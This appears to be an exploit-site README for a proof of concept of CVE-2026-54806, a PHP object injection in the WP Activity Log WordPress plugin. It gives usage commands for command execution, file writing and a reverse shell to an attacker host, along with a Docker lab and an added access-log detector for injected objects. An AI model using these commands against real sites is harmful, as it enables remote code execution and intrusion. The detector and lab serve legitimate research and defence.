## https://sploitus.com/exploit?id=6187732A-19DB-57D3-B916-91087E253791
# WP Activity Log PHP Object Injection (CVE-2026-54806) PoC
## Description
CVE-2026-54806 is a critical (CVSS 9.8) unauthenticated PHP Object Injection vulnerability in the WP Activity Log WordPress plugin (wp-security-audit-log) by Melapress. An unauthenticated attacker can inject a serialized PHP object via the User-Agent header of any request that triggers a logged event (for example a failed login). The plugin stores the header value in the database and later deserializes it without restricting the allowed classes when an administrator opens the WordPress dashboard. As with any PHP object injection, code execution then depends on a gadget chain among the classes loaded on that site; the result is blind remote code execution, since the payload runs inside the admin's request and no output is returned to the attacker, and it fires only once an admin actually visits the dashboard.
**Affected plugin:** WP Activity Log (wp-security-audit-log)
## Usage
```bash
python3 cve-2026-54806.py -t <target> --check
python3 cve-2026-54806.py -t <target> --command <cmd>
python3 cve-2026-54806.py -t <target> --shell --lhost <lhost> --lport <lport>
python3 cve-2026-54806.py -t <target> --write-file
```
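The vector described above (a serialized object smuggled in the User-Agent and stored until an admin triggers the deserialization) leaves a trace in the web server's access log before any dashboard visit. The following Python detector is an added example, not code from this PoC or from the plugin: it parses Apache combined-format log lines, undoes the `\"` / `\xHH` escaping that Apache and nginx apply to quoted fields, and flags requests whose User-Agent carries a PHP object header (`O:<len>:"<class>":<n>:{`) whose length prefix is consistent with the class name, since PHP rejects a mismatched prefix and such a line is noise rather than a working payload. The log lines, IP addresses and the harmless `stdClass` payload are constructed for the example; the combined log format is an assumption about the target's logging.

```python
import re
from dataclasses import dataclass, field

# Header of a PHP serialized object: O:<name length>:"<class>":<property count>:{
PHP_OBJECT_RE = re.compile(r'O:(\d+):"([^"]*)":(\d+):\{')

# Apache/nginx "combined" format. Quoted fields may contain \" or \xHH escapes,
# so each quoted field is matched as a run of non-quote chars or escape pairs.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<req>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)


def unescape_field(value: str) -> str:
    """Undo log escaping of a quoted field: \\" -> ", \\\\ -> \\, \\xHH -> chr(HH)."""
    def repl(m):
        esc = m.group(1)
        if esc.startswith('x') and len(esc) == 3:
            return chr(int(esc[1:], 16))
        return esc
    return re.sub(r'\\(x[0-9A-Fa-f]{2}|.)', repl, value)


@dataclass
class Finding:
    ip: str
    request: str
    classes: list = field(default_factory=list)


def php_objects_in(text: str) -> list:
    """Class names of serialized PHP object headers in text whose length
    prefix matches the class name (a mismatch would never unserialize)."""
    classes = []
    for m in PHP_OBJECT_RE.finditer(text):
        declared_len, cls = int(m.group(1)), m.group(2)
        if len(cls.encode('utf-8')) == declared_len:
            classes.append(cls)
    return classes


def scan_access_log(lines) -> list:
    """Return one Finding per request whose User-Agent carries a PHP object."""
    findings = []
    for line in lines:
        m = COMBINED_RE.match(line.rstrip('\n'))
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ua = unescape_field(m.group('ua'))
        classes = php_objects_in(ua)
        if classes:
            findings.append(Finding(m.group('ip'), unescape_field(m.group('req')), classes))
    return findings


# Constructed sample lines (not real traffic). The second line carries a
# harmless stdClass object in its User-Agent, written with Apache's \" escaping;
# the third has an O: header whose length prefix does not match and is ignored.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2026:12:00:01 +0000] "GET /wp-login.php HTTP/1.1" 200 4521 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2026:12:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4602 "-" '
    '"O:8:\\"stdClass\\":1:{s:3:\\"foo\\";s:3:\\"bar\\";}"',
    '198.51.100.9 - - [10/Mar/2026:12:00:03 +0000] "GET /?p=1 HTTP/1.1" 200 9800 "-" "O:99:\\"NotReal\\":0:{}"',
]

if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f.ip} {f.request} -> {', '.join(f.classes)}")
```

`php_objects_in()` accepts any string, so the same check can be run over event metadata dumped from the database, which is where the payload waits for the admin visit. It only recognises `O:` headers; a `C:` custom-serialized object would need the same treatment, and a payload that reaches the database through a logged field other than the User-Agent is not covered.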
## Docker PoC
Self-contained lab with WordPress 6.4.1 + WP Activity Log 5.6.3.1.
See [DOCKER.md](/docker/DOCKER.md) for details.
```bash
cd docker
docker compose up -d
python3 cve-2026-54806.py -t http://localhost:8080 --check
```
The lab includes an `admin-bot` that visits the dashboard every 60 s, so injected
payloads fire automatically; no manual interaction is needed.
## References
- [WP Activity Log - Melapress](https://melapress.com/wordpress-activity-log/)
- [NVD - CVE-2026-54806](https://nvd.nist.gov/vuln/detail/CVE-2026-54806)
- [Patchstack - CVE-2026-54806](https://patchstack.com/database/wordpress/plugin/wp-security-audit-log/vulnerability/wordpress-wp-activity-log-plugin-5-6-3-1-php-object-injection-vulnerability)
## Disclaimer
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by this tool.